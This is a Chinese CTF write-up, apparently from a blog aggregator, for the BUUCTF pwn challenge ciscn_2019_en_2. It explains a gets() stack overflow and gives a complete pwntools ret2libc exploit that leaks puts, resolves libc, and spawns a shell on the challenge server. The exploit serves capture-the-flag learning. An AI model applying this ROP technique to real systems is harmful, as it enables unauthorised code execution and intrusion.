news 2026/4/18 9:41:12

buuctf中的ciscn_2019_en_2

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
buuctf中的ciscn_2019_en_2

首先checksec检查保护机制:

-64位程序

-开启了栈不可执行保护

接下来使用IDA反汇编工具进行分析:

发现begin函数,点进去

begin函数内部:

输入1可用进入encrypt函数,输入2可从主函数看到并没有什么用,3是退出程序

这是encrypt函数内部:

get函数可触发栈溢出漏洞,看到这一行代码就可用了,下面的加密过程对破解程序无任何帮助。顺便算出s到栈底的偏移:0x50+0x8 = 0x58

由于在IDA中没发现任何后门函数和system函数地址,所以这里考虑泄露libc后来得到system函数和/bin/sh,这里我们需要构造ROP链来调用函数,所以还需用到ret和rdi的地址,输入以下指令:

ROPgadget --binary pwn --only "pop|ret"

rdi地址:0x400c83,ret地址:0x4006b9,q其中rdi用于调用函数,ret用于栈对齐

再在IDA中拿到encrypt地址,用于第一次泄露libc后再次进入encrypt函数:0x4009A0

基本信息拿到,可用来写exp攻击脚本了:

from pwn import * from LibcSearcher import LibcSearcher context(arch='amd64', os='linux', log_level='debug') #io = process('./pwn') # 在本地运行程序。 # gdb.attach(io) # 启动 GDB io = connect('node5.buuoj.cn',28902) # 与在线环境交互。 encrypt_addr = 0x4009A0 offset = 0x58 elf = ELF('./pwn') puts_got = elf.got['puts'] puts_plt = elf.plt['puts'] rdi_addr = 0x400c83 ret_addr = 0x4006b9 io.recvuntil(b'Input your choice!\n') io.sendline(b'1') io.recvuntil(b'Input your Plaintext to be encrypted\n') payload = b'a'*offset + p64(rdi_addr) + p64(puts_got) + p64(puts_plt) + p64(encrypt_addr) io.sendline(payload) io.recvline() io.recvline() puts_addr = u64(io.recvline().strip().ljust(8,b'\x00')) print(hex(puts_addr)) libc = LibcSearcher('puts',puts_addr) libc_base = puts_addr - libc.dump('puts') system_addr = libc_base + libc.dump('system') bin_sh_addr = libc_base + libc.dump('str_bin_sh') io.recvuntil(b'Input your Plaintext to be encrypted\n') payload = b'a'*offset + p64(ret_addr) + p64(rdi_addr) + p64(bin_sh_addr) + p64(system_addr) io.sendline(payload) io.interactive()

这是运行结果:

这里需要手动选择libc,64位程序就选64位的libc,可能会选到不适配的libc库,多试几次就可用了,拿到shell后手动输入cat flag拿到flag

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/8 12:40:32

Kotaemon面试模拟机器人:AI考官训练求职者

Kotaemon面试模拟机器人:AI考官训练求职者 在招聘旺季,一家科技公司HR每天要筛选上百份简历,安排初面、评估候选人表达能力与逻辑思维。传统流程中,每位候选人的初步沟通至少耗时30分钟,而面试官的主观判断差异又常常导…

作者头像 李华
网站建设 2026/4/12 11:07:21

约翰·伯格的长期投资回报预期管理

约翰伯格的长期投资回报预期管理 关键词:约翰伯格、长期投资、回报预期管理、投资理念、指数基金 摘要:本文围绕约翰伯格的长期投资回报预期管理展开深入探讨。首先介绍了约翰伯格及其投资理念的背景,阐述了长期投资回报预期管理的重要性。接着分析了核心概念及相互联系,通…

作者头像 李华
网站建设 2026/4/17 14:36:42

Kotaemon边缘计算部署:Jetson设备运行可行性验证

Kotaemon边缘计算部署:Jetson设备运行可行性验证 在智能制造车间的一台数控机床前,工程师对着语音助手提问:“E-203设备连续报警过热,该怎么处理?”不到两秒,系统便返回了结构化建议:“请立即停…

作者头像 李华
网站建设 2026/4/18 8:30:21

AI的未来趋势:GPT-5.2与Gemini Deep Research API的深度对比与前景展望

人工智能技术的飞速发展,正深刻改变着各行各业的面貌,特别是在语言处理和科研领域,涌现出了一些创新性产品。近期,OpenAI 和 谷歌 分别发布了各自的重大创新:GPT-5.2 和 Gemini Deep Research API。这两款产品不仅在技…

作者头像 李华
网站建设 2026/4/17 8:57:20

5G工业路由器的深层架构:从射频热管理到链路状态机

摘要: 在IIoT系统中,边缘通信设备的MTBF(平均无故障时间)直接决定了业务连续性。相比于4G设备,5G工业路由器面临着更高的峰值功耗和热流密度。本文将跳过市场营销话术,从PCB设计的电源完整性(PI…

作者头像 李华
网站建设 2026/4/16 14:42:48

Mysten Labs 与不丹王国政府的创新与技术部携手探索离线区块链

要点总结 不丹创新与技术部(InnoTech)隶属于不丹王国政府的商业机构 Druk Holding and Investments(DHI),现已与 Mysten Labs 建立新的合作伙伴关系,探索可验证的数字系统如何在低连接甚至无网络的极端环境…

作者头像 李华